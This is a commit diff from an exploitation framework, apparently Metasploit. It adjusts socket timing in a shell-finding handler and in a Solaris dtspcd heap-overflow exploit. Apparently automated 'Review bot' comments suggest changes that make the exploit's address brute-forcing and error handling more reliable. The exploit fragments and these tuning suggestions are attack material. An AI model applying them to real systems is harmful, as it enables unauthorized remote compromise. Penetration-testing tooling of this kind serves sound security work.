timing fixes
git-svn-id: file:///home/svn/incoming/trunk@3292 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
2bcfd6f0e5
commit
8de634c25f
@ -44,10 +44,12 @@ module FindPort
|
|||
# currently only works for shells.
|
||||
#
|
||||
def handler(sock)
|
||||
return if not sock
|
||||
|
||||
_find_prefix(sock)
|
||||
|
||||
# Flush the receive buffer
|
||||
sock.get(1)
|
||||
sock.get_once(-1, 1)
|
||||
|
||||
# If this is a multi-stage payload, then we just need to blindly
|
||||
# transmit the stage and create the session, hoping that it works.
|
||||
|
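Review bot: The new flush line `sock.get_once(-1, 1)` hard-codes a one-second cap with nothing saying what is being drained or why that bound was picked, and the comment above it only says "Flush the receive buffer"; I would extend it to `# Flush the receive buffer: drain whatever the shell still has queued after the prefix probe; the 1s cap keeps the handler from blocking on a quiet socket` so the next "timing fix" has a rationale to work from. A single `get_once` presumably returns at most one read, so if the shell's trailing output arrives in several pieces some of it can still be pending when the stage goes out; if that can confuse the later echo check, looping until a short read returns nothing would be the safer flush. `handler`'s body continues past the end of this hunk.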
@ -125,7 +127,7 @@ protected
|
|||
sock.put("\necho #{ebuf}\n")
|
||||
|
||||
# Try to read a response
|
||||
rbuf = sock.get(3)
|
||||
rbuf = sock.get_once
|
||||
|
||||
# If it contains our string, then we rock
|
||||
if (rbuf =~ /#{ebuf}/)
|
||||
|
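Review bot: The echo check on the last line, `if (rbuf =~ /#{ebuf}/)`, interpolates the marker into a regex unescaped, so a correct shell is silently rejected whenever `ebuf` happens to contain a regex metacharacter; `if rbuf && rbuf.include?(ebuf)` (or `Regexp.escape(ebuf)`) tests for the literal marker and also tolerates a nil `rbuf` from a timed-out read. The new `rbuf = sock.get_once` drops the explicit bound the replaced `sock.get(3)` carried, so the per-port wait now depends on `get_once`'s default timeout, which I cannot see from here; passing the intended value explicitly would document what this "timing fix" is tuning. The enclosing method starts before this hunk and continues after it, and `ebuf` is built outside the visible lines.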
|
|
@ -62,10 +62,16 @@ class Exploits::Solaris::Dtspcd::Heap_Noir < Msf::Exploit::Remote
|
|||
rbase = target['Rets'][1]
|
||||
|
||||
while (rbase < target['Rets'][2]) do
|
||||
print_status(sprintf("Trying 0x%.8x 0x%.8x...", target['Rets'][0] + tjmp, rbase))
|
||||
attack(target['Rets'][0] + tjmp, rbase, payload.encoded)
|
||||
attack(target['Rets'][0] + tjmp, rbase + 4, payload.encoded)
|
||||
rbase += target['Rets'][3]
|
||||
break if session_created?
|
||||
begin
|
||||
print_status(sprintf("Trying 0x%.8x 0x%.8x...", target['Rets'][0] + tjmp, rbase))
|
||||
attack(target['Rets'][0] + tjmp, rbase, payload.encoded)
|
||||
break if session_created?
|
||||
|
||||
attack(target['Rets'][0] + tjmp, rbase + 4, payload.encoded)
|
||||
rbase += target['Rets'][3]
|
||||
rescue EOFError
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
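Review bot: In the new loop body `rbase += target['Rets'][3]` only runs after both `attack` calls return, so when the first `attack` raises `EOFError` the empty `rescue EOFError` swallows it and the `while` re-runs the same `rbase`; if the target drops the connection deterministically at that address the loop never terminates. Advancing the candidate regardless of how the attempt ends fixes this: `rescue EOFError` / `ensure` / `rbase += target['Rets'][3]` (the `ensure` also fires on the `break`, which is harmless because the loop exits). A `print_status("Target closed the connection, trying next address")` inside the rescue would also make the disconnect visible instead of silent. The enclosing method starts before this hunk.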
@ -113,11 +119,15 @@ class Exploits::Solaris::Dtspcd::Heap_Noir < Msf::Exploit::Remote
|
|||
buf << "X" * ((0x103e - 8) - buf.length)
|
||||
|
||||
spc_write(spc_register("", buf), 4)
|
||||
sock.get_once(-1)
|
||||
|
||||
handler
|
||||
|
||||
rescue EOFError
|
||||
rescue => e
|
||||
$stderr.puts "Error: #{e.to_s} #{e.class.to_s}"
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
||||
|
||||
|
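Review bot: The `rescue => e` / `$stderr.puts "Error: ..."` pair catches every StandardError — including `EOFError`, which the `rescue EOFError` added to the retry loop earlier in this commit is meant to handle — so a dropped connection here returns normally and that caller (presumably this is the tail of `attack`) cannot tell it from a clean miss; either re-raise after logging (`raise`) or keep the rescue narrow. Writing to `$stderr` also bypasses the module's own output path (`print_status` is used in the previous hunk), so `print_error("Error: #{e.class}: #{e}")` would keep the message with the rest of the exploit output. I cannot tell from the rendered hunk whether the `rescue EOFError` line is the old or the new side; if both clauses remain, the EOFError one is an empty swallow and deserves at least `# expected: dtspcd drops the connection on a bad address` or similar. The enclosing method and its `begin` start before this hunk.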
|